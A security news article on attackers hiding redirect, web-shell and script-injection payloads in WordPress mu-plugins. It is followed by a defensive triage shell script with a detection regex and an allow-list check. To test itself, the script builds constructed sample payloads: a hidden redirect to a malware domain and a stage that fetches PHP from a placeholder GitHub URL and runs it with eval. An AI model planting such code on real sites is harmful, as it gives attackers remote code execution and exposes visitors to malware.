Hackers abuse MU plugins to inject malicious payloads into WordPress

📟 News

Date: 01/04/2025

According to Sucuri, attackers are storing malicious code in the WordPress mu-plugins (Must-Use Plugins) directory, where it runs on every request without being noticed.

The technique was first observed in February 2025; since then its use has kept growing, and attackers are currently abusing MU plugins to run three different types of malicious code.

Must-Use Plugins are a special type of WordPress plugin that is loaded on every request and does not need to be activated in the admin panel. These PHP files live in the wp-content/mu-plugins/ directory: WordPress executes every top-level .php file there automatically, they cannot be deactivated from the admin panel (only by deleting the file), and they do not appear on the Plugins page unless the Must-Use filter is selected.

Legitimate uses include enforcing site-wide security rules, performance tweaks, and adjusting configuration values at runtime.

Because MU plugins run on every request and are absent from the standard plugin list, they are a convenient place to hide a wide range of malicious operations (stealing credentials, injecting malicious code, or rewriting the HTML output).

Sucuri's researchers found three different payloads that attackers had dropped into the mu-plugins directory:

  • redirect.php redirects visitors (except search bots and logged-in admins) to the malicious site updatesnow[.]net, which shows a fake browser update prompt to trick the victim into downloading malware;
  • index.php is a web shell that acts as a backdoor, downloading PHP code from a GitHub repository and executing it; and
  • custom-js-loader.php loads JavaScript that replaces every image on the site with explicit content, hijacks all outbound links, and opens fraudulent pop-ups in their place.

The web shell is the most dangerous of the three: it lets attackers execute commands on the server remotely, steal data, and stage further attacks against the site's users and visitors.

The other two samples mainly damage the site's reputation and search rankings, through the suspicious redirects and the attempts to push malware onto visitors' machines.

How the attackers get in is still unknown. Sucuri assumes they exploit known vulnerabilities in WordPress plugins and themes, or simply weak admin credentials.
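Pulling together the MU-plugin loading behaviour described above and the three payload types Sucuri lists, the following triage script is an added example for this article (not Sucuri's tooling and not WordPress code). It assumes a standard wp-content/mu-plugins/ layout; the indicator regex, the constructed sample files it builds for a stand-alone run, and the placeholder GitHub path inside them are all assumptions modelled on the descriptions above, not the actual samples from the report.

```shell
#!/bin/sh
# mu-triage.sh: first-pass triage of wp-content/mu-plugins/ on a WordPress host.
# Added example for this article; not Sucuri's tooling and not WordPress core.
# The patterns are heuristics built from the three payload types the article
# describes, not vendor signatures: legitimate plugins can match, so every hit
# still needs a human look.
set -u

# Worth a second look inside an MU plugin:
#  - redirect payload: Location: headers / wp_redirect(), User-Agent checks,
#    the updatesnow[.]net domain from the article (matched defanged or not)
#  - web shell: a remote fetch (file_get_contents/curl_exec to a URL, raw
#    GitHub content) next to eval()/assert(), or base64/gzinflate/rot13 blobs
#  - JS loader: a <script src="https://..."> tag emitted from PHP
MU_IOC_REGEX='eval\(|assert\(|base64_decode\(|gzinflate\(|str_rot13\(|file_get_contents\(.{0,2}https?://|curl_exec\(|raw\.githubusercontent\.com|wp_redirect\(|Location:|HTTP_USER_AGENT|updatesnow\[?\.\]?net|<script[^>]*src=.{0,2}https?://'

# scan_mu_plugins WP_ROOT: print "SUSPECT <path> [<indicators>]" per matching file.
scan_mu_plugins() {
  wp_root=$1
  dir="$wp_root/wp-content/mu-plugins"
  [ -d "$dir" ] || { echo "no mu-plugins directory under $wp_root"; return 0; }
  # Walk every file, not only *.php: WordPress auto-loads just the top-level
  # .php files, but a one-line top-level loader can include anything from a
  # subdirectory, which is then where the real payload lives.
  find "$dir" -type f | sort | while IFS= read -r f; do
    hits=$(grep -oE "$MU_IOC_REGEX" "$f" 2>/dev/null | sort -u | tr '\n' ',')
    if [ -n "$hits" ]; then
      printf 'SUSPECT %s [%s]\n' "${f#"$wp_root"/}" "${hits%,}"
    fi
  done
  return 0
}

# check_allowlist WP_ROOT ALLOWFILE: report files missing from the operator's
# known-good list (one path per line, relative to mu-plugins/). Content-agnostic,
# so it also catches payloads the regex misses, including an innocent loader.
check_allowlist() {
  wp_root=$1
  allow=$2
  dir="$wp_root/wp-content/mu-plugins"
  [ -d "$dir" ] || return 0
  find "$dir" -type f | sort | while IFS= read -r f; do
    rel=${f#"$dir"/}
    if ! grep -qxF -- "$rel" "$allow"; then
      printf 'UNEXPECTED %s\n' "$rel"
    fi
  done
  return 0
}

# make_sample_site: build a throwaway tree with constructed MU plugin files
# (modelled on the article's descriptions, not the real samples; the GitHub
# path is a placeholder) and print its root path.
make_sample_site() {
  root=$(mktemp -d)
  mu="$root/wp-content/mu-plugins"
  mkdir -p "$mu/vendor"
  cat > "$mu/site-tweaks.php" <<'EOF'
<?php
// Benign site-specific tweak: hide the WordPress version from page headers.
remove_action('wp_head', 'wp_generator');
EOF
  cat > "$mu/redirect.php" <<'EOF'
<?php
// Constructed redirect-style payload: skips crawlers and site admins.
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
if (!preg_match('/bot|crawl|spider/i', $ua) && !current_user_can('manage_options')) {
    header('Location: https://updatesnow[.]net/update');
    exit;
}
EOF
  cat > "$mu/index.php" <<'EOF'
<?php require_once __DIR__ . '/vendor/helper.php';
EOF
  cat > "$mu/vendor/helper.php" <<'EOF'
<?php
// Constructed web-shell stage: fetch PHP from a raw GitHub URL and run it.
$code = file_get_contents('https://raw.githubusercontent.com/example/repo/main/payload.txt');
if ($code !== false) { eval(strtr($code, ['<?php' => ''])); }
EOF
  printf '%s\n' "$root"
}

# Entry point: "mu-triage.sh /var/www/html [allowlist.txt]" triages a real site;
# with no arguments it runs against the constructed sample tree.
mu_triage_main() {
  if [ -n "${1:-}" ]; then
    scan_mu_plugins "$1"
    if [ -n "${2:-}" ]; then check_allowlist "$1" "$2"; fi
    return 0
  fi
  root=$(make_sample_site)
  printf 'site-tweaks.php\n' > "$root/allow.txt"
  scan_mu_plugins "$root"
  check_allowlist "$root" "$root/allow.txt"
  rm -rf "$root"
}
mu_triage_main "$@"
```

On the sample tree the content scan flags redirect.php and vendor/helper.php but not the one-line index.php loader, while the allow-list check flags all three; in practice the allow list is the stronger signal, since an MU plugin you did not put there has no business existing and the only way to disable it is to delete the file. Do not trust file timestamps when deciding what is new; compare against a known-good backup or deployment artefact, and treat a web shell hit as a full compromise that calls for credential rotation and an entry-vector hunt, not just file removal.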
